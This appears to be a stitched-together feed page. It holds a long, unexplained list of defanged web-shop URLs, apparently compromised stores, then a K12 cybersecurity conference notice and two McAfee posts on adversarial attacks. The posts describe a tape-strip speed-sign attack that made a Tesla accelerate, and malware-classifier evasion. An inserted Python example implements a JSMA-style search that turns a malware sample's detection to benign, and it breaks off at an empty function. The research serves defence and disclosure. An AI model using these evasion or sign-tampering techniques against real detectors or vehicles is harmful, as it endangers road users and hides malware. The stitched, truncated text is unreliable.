URL: http://www.]webshopsmagento.]nl/
URL: http://jewelsofdesert.]com/
URL: http://www.]khadioutlet.]com/
URL: http://lequeens.]com/
URL: http://stilprinzessin.]com/
URL: http://www.]doreall.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]fangshicube.]com/
URL: http://luggagemama.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://cyprusitstore.]com/
URL: https://deals4kart.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.]php?route=checkout/checkout
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: https://www.]chirobuddy.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://www.]matexbuyer.]com/
URL: http://www.]webshopsmagento.]nl/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]doreall.]com/
URL: https://pinkime.]com/
URL: https://www.]websun.]us/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://only16.]net/
URL: http://labdooshoes.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://lequeens.]com/
URL: http://www.]athleticmmagear.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]almosauto.]in/
URL: http://douspeakgreen.]in/
URL: http://www.]eurekacosmetics.]com/
URL: http://hotelcathedrale.]be/
URL: http://coripa.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]tribalasia.]com.]my/
URL: http://hotelcathedrale.]be/
URL: https://www.]xinginroo.]com/
URL: http://magesource.]su/
URL: https://www.]khadiindia.]in/
URL: http://www.]supritam.]com/
URL: http://magesource.]su/
URL: http://store.]curiousinventor.]com/
URL: http://www.]blendystraw.]com/
URL: http://www.]barcoderfidstore.]com/
URL: http://douspeakgreen.]in/
URL: http://fashionfromla.]com/
URL: http://seasonallivingokc.]com/
URL: http://floorzndoorz.]com/
URL: http://formula-depot.]com/
URL: http://zigoh.]com/
URL: https://www.]baleyo.]com/
URL: http://luggagemama.]com/
URL: http://magesource.]su/
URL: http://hotelcathedrale.]be/
URL: http://emediks.]com/store/
URL: http://www.]fashionaxe.]com/
URL: http://schrikdraad.]nu/
URL: http://www.]liquidfillingpastefilling.]com/
URL: http://hotelcathedrale.]be/
URL: http://bymatty.]com/
URL: http://www.]sclabrine.]com/
URL: https://www.]bluecactus.]co/
URL: http://fashionavenue.]ma/
URL: http://yesforlov.]sk/
URL: https://vytunuj.]sk/
URL: http://www.]nflskjor.]com/
URL: http://www.]acolortree.]com/
URL: https://cobrafashions.]com/
URL: http://www.]wondershop.]in/
URL: http://sockitupsocks.]com/
URL: http://richbumlife.]com/
URL: http://gypsygfashionaccessories.]com/
URL: https://www.]bvsecurity.]com/
URL: http://www.]fiskrose.]com/
URL: https://espacomanix.]com.]br/
URL: http://www.]nixim3dpuzzle.]com/
URL: http://www.]almosauto.]in/
URL: http://www.]mage-apps.]de/
URL: http://budstok.]com.]ua/
URL: http://stage.]citizencashmere.]com/
URL: http://www.]nitazdesign.]com/
URL: http://goldwithyou.]com/
URL: http://chkmaid.]com/
URL: http://www.]mattiaus.]com/
URL: http://www.]hcgsci.]com/
URL: http://eshop.]wengthyelot54.]com/
URL: http://bartonwest.]com/
URL: http://gravurator.]de/
URL: http://platz.]com.]ua/
URL: https://5eboard.]com/
URL: http://khadder.]in/
URL: https://novnation.]com/
URL: https://www.]taptye.]com/
URL: https://seelar.]com/
URL: http://www.]1quickcomp.]com/
URL: http://pinul.]com/
URL: http://www.]99materials.]com/
URL: http://southernvapor.]com/
URL: http://www.]pejenterprisesinc.]com/
URL: http://www.]ejoyeeta.]com/
URL: http://www.]retailsigningsolutions.]com/
URL: http://www.]fyringe.]com/
URL: http://www.]suninbox.]co.]uk/
URL: http://www.]gohoyo.]com/
URL: http://eveday.]com/
URL: https://www.]el-taller.]pe/
URL: https://www.]dazzstyle.]com/
URL: http://montecitocaviar.]com/
URL: http://www.]togotelecom.]ca/
URL: http://swimresearch.]com/
URL: https://eighteditions.]com/
URL: https://srmall.]net/
URL: https://hyperstrength.]com/
URL: https://www.]gardenarteu.]com/
URL: http://deltanineclothing.]com/
URL: http://www.]storerab.]com/
URL: http://floorzndoorz.]com/
URL: http://4girlsaccessories.]com/
URL: http://www.]cityflorist.]co.]in/
URL: http://faithandflags.]com/
URL: https://www.]theaugustco.]com/
URL: http://francomotorsports.]com/
URL: http://www.]reviewlista.]com/
URL: http://www.]luckystarparty.]com/
URL: http://www.]interprice.]mx/
URL: http://www.]xxlgrip.]com/
URL: http://avstamps.]com/
URL: https://www.]baleyo.]com/
URL: http://www.]905wood.]com/
URL: https://www.]macroman.]in/
URL: http://cuberra.]eu/
URL: https://www.]velmo.]com/
URL: https://wonderna.]com/
URL: http://www.]spectrumlites.]co.]in/
URL: http://kupi-present.]ru/
URL: http://plumbedright.]com/
URL: http://equibuy.]es/
URL: https://www.]tec-heads.]com/
URL: http://advancehealthproducts.]com.]au/
URL: http://www.]inflatable-zone.]org/
URL: https://dermagold.]sg/
URL: http://www.]ibericos.]es/
URL: http://worldstogether.]com/
URL: http://www.]reflect-store.]com/
URL: http://www.]kaajalsarees.]com/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]benzin-im-blut.]com/
URL: http://www.]ladago.]co.]uk/
URL: http://clonadipet.]com.]br/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://onestophairandbeauty.]ie/
URL: http://www.]jensalwholesale.]com/
URL: https://www.]chirobuddy.]net/
URL: http://tile.]tilesandiego.]com/
URL: https://morrio.]com/
URL: http://cadresrobain.]fr/
URL: http://www.]petzy.]com.]au/
URL: http://www.]dysin.]com/
URL: http://buyvipbaby.]com/login/
URL: http://www.]olisano.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://www.]ludoville.]it/
URL: http://zigoh.]com/
URL: http://usacontainergroup.]com/
URL: https://www.]clinicallearning.]com/index.]php/
URL: http://www.]farmcraft.]at/
URL: http://www.]poyood.]com/
URL: http://euromigracija.]lt/
URL: http://goofballstuff.]com/
URL: https://www.]enlivenglobal.]com/
URL: http://www.]turyagatea.]com/
URL: http://creekfire.]com/
URL: http://nowknow.]ch/
URL: http://vkconline.]com/
URL: https://trinitysurvival.]com/
URL: http://www.]eboxim.]com/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]danatsouq.]com/
URL: https://www.]callidae.]com/
URL: https://www.]tramit.]it/
URL: http://jjnc.]com.]hk/
URL: http://shop.]taketime.]ch/
URL: https://lacnehry.]sk/
URL: https://ibercorte.]com/
URL: http://www.]macmax.]com/uk/
URL: http://www.]raquelrecargas.]com.]br/
URL: http://www.]hotsca.]com/
URL: http://www.]jarab.]london/
URL: http://www.]webshopsmagento.]nl/
URL: http://start-finish.]ru/
URL: http://www.]officiel.]it/
URL: http://www.]isbbookstore.]com/
URL: http://www.]krirob.]nu/
URL: http://www.]eurekacosmetics.]com/
URL: http://kupu.]es/
URL: http://en.]lileauxbrocantes.]com/nouveautes.]html
URL: http://girlsandpearls.]com/
URL: https://www.]websun.]us/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://piese-gm.]ro/
URL: http://www.]diamondsnyou.]com/
URL: http://ccgobuy.]com/
URL: http://olenobra.]com/
URL: https://www.]eternis.]pt/
URL: http://infcollection.]com/
URL: http://lojamundodosgames.]com/
URL: http://purplebluepublishing.]com/
URL: https://www.]autowheelexperts.]com/
URL: https://www.]gizell.]ro/
URL: http://smalldogsdepot.]com/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://laborisfarma.]pl/
URL: http://fashionfromla.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]soothnshine.]com/
URL: http://jacksvapes.]com/
URL: https://www.]richgromart.]com/
URL: http://www.]safetreksales.]com/
URL: http://ibundo.]de/
URL: http://www.]megamojster.]si/
URL: http://rpkorea.]com/
URL: http://discountadda.]com/
URL: http://www.]enotecaosteriaroma.]it/
URL: http://nopainnomusa.]com/
URL: https://www.]shopforsaundarya.]com/
URL: http://accessoriesdeluxe.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]ghulamali.]com.]pk/
URL: http://www.]hardshot.]fr/
URL: http://countrystorecampinas.]com.]br/
URL: http://p-d-r.]ru/
URL: http://demo.]freelunchlabs.]com/
URL: http://atopmall.]kr/
URL: http://hurtsilvermagic.]pl/customer/account/login/
URL: https://www.]afsr-simivalley-shop.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://produtosprofissionais.]com.]br/
URL: https://my.]nutis.]com/
URL: https://www.]smclinic.]bg/
URL: https://www.]wisesolutions.]net/
URL: https://davillblinds.]com/
URL: https://minervamedical.]ca/
URL: http://gamsjaga.]com/
URL: https://jceracing.]com/
URL: http://dhyanaa.]com/
URL: https://weloveheipoa.]com/
URL: http://www.]advanced-pixel-shuttle.]com/
URL: http://allright.]dp.]ua/
URL: http://trueitglobal.]com/
URL: http://www.]nandndesign.]com/
URL: http://antaraxnm.]com/
URL: http://www.]petitkreativ.]at/
URL: https://www.]crowngroup.]net.]au/shop/
URL: http://vanquish.]co.]in/
URL: http://www.]esde.]ro/
URL: https://liquidlightglows.]com/
URL: http://shop.]littleashford.]co.]za/
URL: https://lens4us.]com/
URL: https://www.]westernelitejewelry.]com/
URL: http://www.]mobilprices.]com/
URL: http://blitarzoneid.]blogspot.]com/
URL: http://kraftitude.]com/
URL: http://grupocyber.]net/
URL: http://elektro-wols.]kompass-media.]eu/
URL: http://classico.]nextmp.]net/
URL: http://www.]nationaltiledistribution.]com/
URL: http://bloomingtrails.]com/
URL: http://redcellmedical.]com/
URL: http://patesting.]ie/
URL: http://www.]bysicilia.]it/
URL: http://kibellariding.]com/
URL: https://www.]ladoudounesolde.]com/
URL: http://www.]anjelskedarceky.]sk/
URL: https://poolstore.]com.]au/
URL: http://sklepsilvermagic.]pl/
URL: http://www.]uebuys.]com/
URL: http://www.]reynsaon.]com/
URL: http://eshop.]javwireless.]com/
URL: http://alphafxtestbooster.]com/
URL: https://decor-boutique.]com/
URL: http://www.]kevinbuou.]com/
URL: https://www.]aioma.]it/
URL: http://luxuryjewelleryto.]com/
URL: http://www.]angcoshop.]com/
URL: https://www.]vayobv.]com/
URL: http://de-lices.]ru/
URL: https://democanopy.]com/
URL: https://mustardoc.]com/
URL: http://www.]gourmetgallery.]sk/
URL: http://fetchscripts.]com/
URL: http://ballcancersucks.]com/
URL: https://xtremevisionhid.]com/
URL: http://www.]brushncanvas.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]haitralled.]com/
URL: https://hanarovendas.]com.]br/
URL: http://www.]plasticrewards.]com/
URL: http://www.]universalbumpkeys.]com/
URL: http://zuzugadgets.]com/
URL: https://freshyeat.]com/
URL: http://alch.]it/
URL: http://asap.]co.]in/
URL: https://www.]majesticlightinginc.]com/
URL: https://www.]1by1shop.]com/
URL: https://www.]kitauto.]pt/
URL: http://sandoggrus.]dk/
URL: http://www.]shieldmans.]com/
URL: http://zapal.]com.]ua/
URL: https://www.]farmaciabovisa.]it/
URL: http://gurmanebi.]com/
URL: http://www.]sportlowcost.]it/
URL: http://www.]minopuntomoda.]com/
URL: http://mstech.]com.]au/
URL: http://magegaga.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://shop-camera.]com/
URL: http://hotelcathedrale.]be/
URL: http://alltradeshowdisplay.]com/
URL: http://hikvision-ir.]com/
URL: http://shop-camera.]com/
URL: http://homelykart.]com/
URL: https://www.]bvsecurity.]com/
URL: http://mebli-z.]com/
URL: https://mustardoc.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://www.]gramton.]com/
URL: http://usacontainergroup.]com/
URL: http://tile.]tilesandiego.]com/
URL: http://bartonwest.]com/
URL: https://www.]dazzstyle.]com/
URL: https://minervamedical.]ca/
URL: http://www.]inflatable-zone.]org/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]hotsca.]com/
URL: http://www.]uebuys.]com/
URL: http://girlsandpearls.]com/
URL: http://obeikandl.]com/
URL: http://thanhloc1.]com/
URL: http://seasonallivingokc.]com/
URL: https://www.]macroman.]in/
URL: https://www.]petremedies.]co.]uk/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://naturagladlife.]com/
URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
URL: https://commercialpoolandspasupplies.]com/
URL: http://www.]sclabrine.]com/
URL: http://www.]quimex.]com.]ar/
URL: http://lojamundodosgames.]com/
URL: http://om10.]ru/
URL: http://www.]webshopsmagento.]nl/
URL: http://www.]suninbox.]co.]uk/
URL: https://www.]vayobv.]com/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]eternis.]pt/
URL: http://www.]arquegym.]com.]br/
URL: http://fetchscripts.]com/
URL: http://petit-univers.]com/
URL: https://www.]krausjeans.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://ledrus.]co.]nz/
URL: http://obeikandl.]com/
URL: http://hotelcathedrale.]be/
URL: http://net-istore.]ro/
URL: http://www.]mrsflorist.]co.]in/
URL: http://shop-camera.]com/

Save the Date for the 6th Annual NICE K12 Cybersecurity Education Conference

6th ANNUAL NICE K12 Cybersecurity Education Conference
SAVE THE DATE: December 7-8, 2020
LOCATION: St. Louis, Missouri

We are excited to announce that this year’s NICE K12 Cybersecurity Education Conference will take place on December 7-8, 2020 at the in St. Louis, Missouri.

Key upcoming dates:
Early April - Call for Proposals
July - Early bird registration

Keep up to date at the conference website: k12cybersecurityconference.org. This event is supported by the National Initiative for Cybersecurity Education (NICE), a program of the National Institute of Standards

Model Hacking ADAS to Pave Safer Roads for Autonomous Vehicles

The last several years have been fascinating for those of us who have been eagerly observing the steady move towards autonomous driving. While semi-autonomous vehicles have existed for many years, the vision of fleets of fully autonomous vehicles operating as a single connected entity is very much still a thing of the future. However, the latest technical advances in this area bring us a unique and compelling picture of some of the capabilities we might expect to see “down the road.” Pun intended.

For example, nearly every new vehicle produced in 2019 has a model which implements state-of-the-art sensors that utilize analytics technologies, such as machine learning or artificial intelligence, and are designed to automate, assist or replace many of the functions humans were formerly responsible for. These can range from rain sensors on the windshield that control the wiper blades, to object-detection sensors using radar and lidar for collision avoidance, to camera systems capable of recognizing objects in range and providing direct driving input to the vehicle.

This broad adoption represents a fascinating development in our industry; it’s one of those very rare times when researchers can lead the curve ahead of adversaries in identifying weaknesses in underlying systems.

McAfee Advanced Threat Research (ATR) has a specific goal: identify and illuminate a broad spectrum of threats in today’s complex landscape. With model hacking, the study of how adversaries could target and evade artificial intelligence, we have an incredible opportunity to influence the awareness, understanding and development of more secure technologies before they are implemented in a way that has real value to the adversary.

With this in mind, we decided to focus our efforts on the broadly deployed MobilEye camera system, today utilized across over 40 million vehicles, including Tesla models that implement Hardware Pack 1.

18 Months of Research

McAfee Advanced Threat Research follows a responsible disclosure policy, as stated on our website. As such, we disclosed the findings below to both Tesla and MobilEye 90 days prior to public disclosure. McAfee disclosed the findings to Tesla on September 27th, 2019 and MobilEye on October 3rd, 2019. Both vendors indicated interest and were grateful for the research but have not expressed any current plans to address the issue on the existing platform. MobilEye did indicate that the more recent version(s) of the camera system address these use cases.

MobilEye is one of the leading vendors of Advanced Driver Assist Systems (ADAS), catering to some of the world’s most advanced automotive companies. Tesla, on the other hand, is a name synonymous with ground-breaking innovation, providing the world with innovative and eco-friendly smart cars.


MobilEye camera sensor
A table showing MobilEye’s EyeQ3 being used in Tesla’s hardware pack 1.

As we briefly mention above, McAfee Advanced Threat Research has been studying what we call “Model Hacking,” also known in the industry as adversarial machine learning. Model Hacking is the concept of exploiting weaknesses universally present in machine learning algorithms to achieve adverse results. We do this to identify the upcoming problems in an industry that is evolving technology at a pace that security has not kept up with.

We started our journey into the world of model hacking by replicating industry papers on methods of attacking machine learning image classifier systems used in autonomous vehicles, with a focus on causing misclassifications of traffic signs. We were able to reproduce and significantly expand upon previous research focused on stop signs, including both targeted attacks, which aim for a specific misclassification, as well as untargeted attacks, which don’t prescribe what an image is misclassified as, just that it is misclassified. Ultimately, we were successful in creating extremely efficient digital attacks which could cause misclassifications of a highly robust classifier, built to determine with high precision and accuracy what it is looking at, approaching 100% confidence.

Targeted digital white-box attack on stop sign, causing custom traffic sign classifier to misclassify as 35-mph speed sign

We further expanded our efforts to create physical stickers, shown below, that model the same type of perturbations, or digital changes to the original photo, which trigger weaknesses in the classifier and cause it to misclassify the target image.

Targeted physical white-box attack on stop sign, causing custom traffic sign classifier to misclassify the stop sign as an added lane sign

This set of stickers has been specifically created with the right combination of color, size and location on the target sign to cause a robust webcam-based image classifier to think it is looking at an “Added Lane” sign instead of a stop sign.

Video demo of our resilient classifier in the lab which correctly recognizes the 35-mph speed limit sign, even when it is partially obstructed

In reality, modern vehicles don’t yet rely on stop signs to enable any kind of autonomous features such as applying the brakes, so we decided to alter our approach and shift (pun intended) over to speed limit signs. We knew, for example, that the MobilEye camera is used by some vehicles to determine the speed limit, display it on the heads-up display (HUD), and potentially even feed that speed limit to certain features of the car related to autonomous driving. We’ll come back to that!

We then repeated the stop sign experiments on speed limit signs, using a highly robust classifier and our trusty high-resolution webcam. And just to show how robust our classifier is, we can make many changes to the sign — block it partially, place the stickers in random locations — and the classifier does an outstanding job of correctly predicting the true sign, as demonstrated in the video above. While there were many obstacles to achieving the same success, we were ultimately able to prove both targeted and untargeted attacks, digitally and physically, against speed limit signs. The below images highlight a few of those tests.

Example of targeted digital perturbations printed out using a black and white printer which cause a misclassification of 35-mph speed sign to 45-mph speed sign.

At this point, you might be wondering “what’s so special about tricking a webcam into misclassifying a speed limit sign, outside of just the cool factor?” Not much, really. We felt the same, and decided it was time to test the “black box theory.”

What this means, in its most simple form, is that attacks leveraging model hacking which are trained and executed against a white box, also known as an open source system, will successfully transfer to a black box, a fully closed and proprietary system, so long as the features and properties of the attack are similar enough. For example, if one system is relying on the specific numeric values of the pixels of an image to classify it, the attack should replicate on another camera system that relies on pixel-based features as well.

The last part of our lab-based testing involved simplifying this attack and applying it to a real-world target. We wondered whether the MobilEye camera was as robust as the webcam-based classifier we built in the lab. Would it truly require several highly specific and easily noticeable stickers to cause a misclassification? Thanks to several friendly office employees, we were able to run repeated tests on a 2016 Model “S” and 2016 Model “X” Tesla using the MobilEye camera (Tesla’s hardware pack 1 with EyeQ3 MobilEye chip). The first test involved simply attempting to recreate the physical sticker test, and it worked, almost immediately and with a high rate of reproducibility.

In our lab tests, we had developed attacks that were resistant to changes in angle, lighting and even reflectivity, knowing this would emulate real-world conditions. While these weren’t perfect, our results were relatively consistent in getting the MobilEye camera to think it was looking at a different speed limit sign than it was. The next step in our testing was to reduce the number of stickers to determine at which point they failed to cause a misclassification. As we began, we realized that the HUD continued to misclassify the speed limit sign. We continued reducing stickers from 4 adversarial stickers in the only locations possible to confuse our webcam, all the way down to a single piece of black electrical tape, approximately 2 inches long, extending the middle of the 3 on the traffic sign.

A robust, inconspicuous black sticker achieves a misclassification from the Tesla model S, used for Speed Assist when activating TACC (Traffic Aware Cruise Control)

Even to a trained eye, this hardly looks suspicious or malicious, and many who saw it didn’t realize the sign had been altered at all. This tiny piece of sticker was all it took to make the MobilEye camera’s top prediction for the sign 85 mph.

The finish line was close (last pun…probably).

Finally, we began to investigate whether any of the features of the camera sensor might directly affect any of the mechanical, and even more relevant, autonomous features of the car. After extensive study, we came across a forum referencing the fact that a feature known as Tesla Automatic Cruise Control (TACC) could use speed limit signs as input to set the vehicle speed.

There was a majority consensus among owners that this might be a supported feature, but it was also clear that there was confusion among forum members as to whether this capability was possible, so our next step was to verify by consulting Tesla software updates and new feature releases.

A software release for TACC contained just enough information to point us towards speed assist, with the following statement, under the Tesla Automatic Cruise Control feature description.

“You can now immediately adjust your set speed to the speed determined by Speed Assist.”

This took us down our final documentation-searching rabbit hole; Speed Assist, a feature quietly rolled out by Tesla in 2014.

Finally! We can now add these all up to surmise that it might be possible, for Tesla models enabled with Speed Assist (SA) and Tesla Automatic Cruise Control (TACC), to use our simple modification to a traffic sign to cause the car to increase speed on its own!

Despite being confident this was theoretically possible, we decided to simply run some tests to see for ourselves.

McAfee ATR’s lead researcher on the project, Shivangee Trivedi, partnered with another of our vulnerability researchers Mark Bereza, who just so happened to own a Tesla that exhibited all these features. Thanks Mark!

For an exhaustive look at the number of tests, conditions, and equipment used to replicate and verify misclassification on this target, we have published our test matrix here.

The ultimate finding here is that we were able to achieve the original goal. By making a tiny sticker-based modification to our speed limit sign, we were able to cause a targeted misclassification of the MobilEye camera on a Tesla and use it to cause the vehicle to autonomously speed up to 85 mph when reading a 35-mph sign. For safety reasons, the video demonstration shows the speed start to spike and TACC accelerate on its way to 85, but given our test conditions, we apply the brakes well before it reaches target speed. It is worth noting that this is seemingly only possible on the first implementation of TACC when the driver double taps the lever, engaging TACC. If the misclassification is successful, the autopilot engages 100% of the time. This quick demo video shows all these concepts coming together.

Of note is that all these findings were tested against earlier versions (Tesla hardware pack 1, mobilEye version EyeQ3) of the MobilEye camera platform. We did get access to a 2020 vehicle implementing the latest version of the MobilEye camera and were pleased to see it did not appear to be susceptible to this attack vector or misclassification, though our testing was very limited. We’re thrilled to see that MobilEye appears to have embraced the community of researchers working to solve this issue and are working to improve the resilience of their product. Still, it will be quite some time before the latest MobilEye camera platform is widely deployed. The vulnerable version of the camera continues to account for a sizeable installation base among Tesla vehicles. The newest models of Tesla vehicles do not implement MobilEye technology any longer, and do not currently appear to support traffic sign recognition at all.

Looking Forward

We feel it is important to close this blog with a reality check. Is there a feasible scenario where an adversary could leverage this type of an attack to cause harm? Yes, but in reality, this work is highly academic at this time. Still, it represents some of the most important work we as an industry can focus on to get ahead of the problem. If vendors and researchers can work together to identify and solve these problems in advance, it would truly be an incredible win for us all. We’ll leave you with this:

In order to drive success in this key industry and shift the perception that machine learning systems are secure, we need to accelerate discussions and awareness of the problems and steer the direction and development of next-generation technologies. Puns intended.

The post Model Hacking ADAS to Pave Safer Roads for Autonomous Vehicles appeared first on McAfee Blogs.

Introduction and Application of Model Hacking

Catherine Huang, Ph.D., and Shivangee Trivedi contributed to this blog.

The term “Adversarial Machine Learning” (AML) is a mouthful!  The term describes a research field regarding the study and design of adversarial attacks targeting Artificial Intelligence (AI) models and features.  Even this simple definition can send the most knowledgeable security practitioner running!  We’ve coined the easier term “model hacking” to enhance the reader’s comprehension of this increasing threat.  In this blog, we will decipher this very important topic and provide examples of the real-world implications, including findings stemming from the combined efforts of McAfee’s Advanced Analytic Team (AAT) and Advanced Threat Research (ATR) for a critical threat in autonomous driving.

1. First, the Basics

AI is interpreted by most markets to include Machine Learning (ML), Deep Learning (DL), and actual AI, and we will succumb to using this general term of AI here.  Within AI, the model – a mathematical algorithm that provides insights to enable business results – can be attacked without knowledge of the actual model created.  Features are those characteristics of a model that define the output desired.  Features can also be attacked without knowledge of the features used!  What we have just described is known as a “black box” attack in AML – not knowing the model and features – or “model hacking.”  Models and/or features can be known or unknown, increasing false positives or negatives, without security awareness unless these vulnerabilities are monitored and ultimately protected and corrected.

In the feedback learning loop of AI, recurrent training of the model occurs in order to comprehend new threats and keep the model current (see Figure 1).  With model hacking, the attacker can poison the Training Set.  However, the Test Set can also be hacked, causing false negatives to increase, evading the model’s intent and misclassifying a model’s decision.  Simply by perturbing – changing the magnitudes of a few features (such as pixels for images), flipping zeros to ones or ones to zeros, or removing a few features – the attacker can wreak havoc in security operations with disastrous effects.  Hackers will continue to “ping” unobtrusively until they are rewarded with nefarious outcomes – and they don’t even have to attack with the same model that we are using initially!

Figure 1. The continuous feedback loop of AI learning.

2. Digital Attacks of Images and Malware

Hackers’ goals can be targeted (specific features and one specific error class) or non-targeted (indiscriminate classifiers and more than one specific error class), digital (e.g., images, audio) or physical (e.g., speed limit sign).  Figure 2 shows a rockhopper penguin targeted digitally.  In a white-box evasion example (we knew the model and the features), a few pixel changes and the poor penguin is now classified as a frying pan or a computer with excellent accuracy.

Figure 2. An evasion example of a white-box, targeted, and digital attack resulting in the penguin being detected as a desktop computer (85.54%) or a frying pan (93.07%) following pixel perturbations.

While most current model hacking research focuses on image recognition, we have investigated evasion attacks and mitigation methods for malware detection and static analysis.  We utilized DREBIN[1], an Android malware dataset, and replicated the results of Grosse et al., 2016[2].  Utilizing 625 malware samples highlighting FakeInstaller, along with 120k benign samples and 5.5K malware samples, we developed a four-layer deep neural network with about 1.5K features (see Figure 3).  However, following an evasion attack that modified fewer than 10 features, the malware evaded the neural net nearly 100% of the time.  This, of course, is a concern to all of us.

Figure 3. Metrics of the malware dataset and sample sizes.

Using the CleverHans[3] open-source library’s Jacobian Saliency Map Approach (JSMA) algorithm, we generated perturbations creating adversarial examples.  Adversarial examples are inputs to ML models that an attacker has intentionally designed to cause the model to make a mistake[1].  The JSMA algorithm requires only a minimal number of features to be modified.  Figure 4 demonstrates the original malware sample (detected as malware with 91% confidence).  After adding just two API calls in a white-box attack, the adversarial example is now detected with 100% confidence as benign. Obviously, that can be catastrophic!

Figure 4. Perturbations added to malware in the feature space resulting in a benign detection with 100% confidence.

In 2016, Papernot[5] demonstrated that an attacker doesn’t need to know the exact model that is utilized in detecting malware.  Demonstrating this theory of transferability in Figure 5, the attacker constructed a source (or substitute) model of a K-Nearest Neighbor (KNN) algorithm, creating adversarial examples, which targeted a Support Vector Machine (SVM) algorithm.  It resulted in an 82.16% success rate, ultimately proving that substitution and transferability of one model to another allows black-box attacks to be, not only possible, but highly successful.

Figure 5. Papernot’s[5] successful transferability of adversarial examples created from one model (K Nearest Neighbor or KNN) to attack another model (Support Vector Machine or SVM).

In a black-box attack, the DREBIN Android malware dataset was detected 92% as malware.  However, using a substitute model and transferring the adversarial examples to the victim (i.e., source) system, we were able to reduce the detection of the malware to nearly zero.  Another catastrophic example!

Figure 6. Demonstration of a black-box attack of DREBIN malware.
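
As an added worked example (not code from McAfee or the CleverHans library), here is the add-only JSMA search from the malware section above, followed by the transferability check just described, on a toy model: a constructed 12-feature logistic regression plays the white-box substitute, and two constructed black-box victims (a linear SVM-style scorer and a nearest-centroid detector) show that the same two-feature perturbation transfers to one but not the other. All feature names, weights and the sample are made up for this example.

```python
import math

# Constructed binary feature space (1 = present in the app), in the spirit of
# DREBIN's permission and API-call features. Names are made up for this example.
FEATURES = [
    "perm.SEND_SMS", "perm.READ_PHONE_STATE", "api.getDeviceId",
    "api.sendTextMessage", "api.getSubscriberId", "perm.INTERNET",
    "api.HttpURLConnection", "api.getSystemService", "api.Log.d",
    "api.setContentView", "api.findViewById", "api.onCreate",
]

# Constructed FakeInstaller-like sample: SMS and device-ID features present.
MALWARE_SAMPLE = [1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1]

# Substitute model (white-box: the weights are known). A constructed logistic
# regression; positive weights push toward "malware", negative toward "benign".
MODEL_A = {
    "weights": [1.2, 0.8, 1.0, 1.4, 0.9, 0.1, 0.0, -1.6, -2.1, -2.4, -1.9, -0.3],
    "bias": -2.0,
}

# Two constructed black-box victims the attacker never sees: a linear SVM-style
# scorer with its own weights, and a nearest-centroid detector whose centroids
# are per-class mean feature rates.
VICTIM_SVM = {
    "weights": [1.0, 0.6, 0.9, 1.1, 0.7, 0.0, -0.1, -1.2, -1.5, -1.7, -1.4, -0.2],
    "bias": -1.6,
}
VICTIM_CENTROID = {
    "malware": [0.8, 0.7, 0.8, 0.8, 0.7, 0.9, 0.6, 0.3, 0.2, 0.2, 0.2, 0.9],
    "benign": [0.05, 0.2, 0.1, 0.05, 0.05, 0.9, 0.7, 0.8, 0.8, 0.9, 0.9, 0.95],
}


def p_malware(model, x):
    """Logistic regression: probability that feature vector x is malware."""
    z = model["bias"] + sum(w * xi for w, xi in zip(model["weights"], x))
    return 1.0 / (1.0 + math.exp(-z))


def svm_is_malware(model, x):
    """Linear decision function: malware if w.x + b > 0."""
    return model["bias"] + sum(w * xi for w, xi in zip(model["weights"], x)) > 0


def centroid_is_malware(model, x):
    """Nearest centroid in squared Euclidean distance."""
    def dist2(c):
        return sum((ci - xi) ** 2 for ci, xi in zip(c, x))
    return dist2(model["malware"]) < dist2(model["benign"])


def jsma_add_only(model, x, threshold=0.5, max_changes=10):
    """
    Greedy JSMA-style search as Grosse et al. adapt it to malware: only flip
    features 0 -> 1 (adding an API call keeps the app functional; removing one
    may break it). For a logistic model dp/dx_i = p(1-p)*w_i, so the absent
    feature with the most negative weight has the highest saliency toward
    "benign". Returns (perturbed_x, names_of_added_features).
    """
    x = list(x)
    added = []
    while p_malware(model, x) >= threshold and len(added) < max_changes:
        candidates = [(w, i) for i, (w, xi) in enumerate(zip(model["weights"], x))
                      if xi == 0 and w < 0]
        if not candidates:
            break                      # nothing left that moves the score
        _, i = min(candidates)
        x[i] = 1
        added.append(FEATURES[i])
    return x, added


def transfer_report(x_adv):
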